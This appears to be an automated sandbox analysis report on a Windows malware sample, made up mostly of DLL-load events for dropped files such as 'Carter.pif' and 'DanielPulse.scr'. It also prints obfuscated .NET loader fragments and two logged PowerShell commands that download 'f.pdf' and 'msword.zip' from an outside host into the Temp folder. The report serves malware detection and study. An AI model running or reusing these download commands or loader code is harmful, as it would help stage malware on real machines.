Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	Section loaded: winmm.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 0000002C.00000000.3492271583.0000000000902000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000002C.00000000.3492271583.0000000000902000.00000002.00000001.01000000.00000012.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 32.3.Carter.pif.3db2268.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 32.3.Carter.pif.3db2268.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
Source: 32.3.Carter.pif.3db2268.1.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
Source: 32.3.Carter.pif.3e14c38.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs	.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://myguyapp.com/f.pdf' -OutFile 'C:\Users\user\AppData\Local\Temp\f.pdf'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'http://myguyapp.com/msword.zip' -OutFile 'C:\Users\user\AppData\Local\Temp\msword.zip'"
